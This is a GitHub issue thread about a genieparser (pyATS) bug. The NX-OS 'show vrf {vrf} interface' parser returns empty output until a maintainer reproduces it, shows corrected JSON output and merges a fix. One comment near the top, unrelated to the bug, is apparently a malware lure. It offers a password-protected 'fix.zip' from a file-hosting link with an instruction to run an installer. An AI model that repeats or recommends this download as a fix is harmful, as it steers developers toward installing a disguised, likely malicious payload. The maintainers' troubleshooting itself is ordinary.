### ISSUE TITLE
[NX-OS] show vrf {vrf} interface - "The pyats library return an error for 'show vrf TEST_TEST interface' for 'nxos'. Error: Parser Output is empty."

### ISSUE THREAD

**Issue by Ernestas-S** [CiscoTestAutomation/genieparser#883]
Command show vrf {vrf} interface returns error instead of correct output.  https://github.com/CiscoTestAutomation/genieparser/blob/master/src/genie/libs/parser/nxos/show_interface.py#L1912

Example output when I use cli command on the NX-OS device:

LAB_NEXUS# show vrf TEST_TEST interface
Interface                 VRF-Name                        VRF-ID  Site-of-Origin
Vlan1199                  TEST_TEST                              31  --
Vlan1999                  TEST_TEST                              31  --
Vlan3959                  TEST_TEST                              31  --
Vlan3960                  TEST_TEST                              31  --

I'm using https://quay.io/ansible/awx-ee:24.6.1 as base image for my custom EE, where I utilize "pip install pyats genie" to install required modules . pyats works, as was able to successfully run other parse commands in other tasks.

**Comment by TrymenT-AlphA** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SohanTirpude** [comment]
Hello @Ernestas-S,

Can you please provide the complete raw device output for the command? I hope the actual VRF name is not the `TEST_TEST`. So, kindly provide the actual value with us. 

If you are not comfortable in sharing the raw output here in open platform, then you may share with us to this mail: pyats-support-ext@cisco.com?

Thank you.

**Comment by SohanTirpude** [comment]
Hello @Ernestas-S,

Kindly provide an update on this. 

Thank you.

**Comment by Ernestas-S** [comment]
Uploading cli output from the Cisco Nexus device and the AWX job output.
![Screenshot](https://github.com/user-attachments/assets/de1f2ec3-5110-4920-b6f0-84ea9e65a653)
![Screenshot 2024-09-03 181431](https://github.com/user-attachments/assets/5ea30ca8-0f35-4073-ad7b-8be40302a661)

**Comment by SohanTirpude** [comment]
Hello @Ernestas-S,

Thank you for the output. And now I was able to reproduce and fix the issue as well. After applying the fix, the parsed output now looks like this:
```
{
    "Vlan1199": {
        "vrf": "KVTC_TEST_SU_KLAIDA",
        "vrf_id": 31,
        "site_of_origin": "--"
    },
    "Vlan1999": {
        "vrf": "KVTC_TEST_SU_KLAIDA",
        "vrf_id": 31,
        "site_of_origin": "--"
    },
    "Vlan3959": {
        "vrf": "KVTC_TEST_SU_KLAIDA",
        "vrf_id": 31,
        "site_of_origin": "--"
    },
    "Vlan3960": {
        "vrf": "KVTC_TEST_SU_KLAIDA",
        "vrf_id": 31,
        "site_of_origin": "--"
    }
}
```
Kindly check and confirm if everything is correct or not.

Thank you.

**Comment by SohanTirpude** [comment]
Hello @Ernestas-S,

The PR got merged and the fix will be available in the pyats 24.9 version. Kindly try and let me know if there is same issue with pyats 24.9 version.

Meanwhile, I am closing this ticket. If you are facing any other issues, kindly open a new ticket.

Thank you.
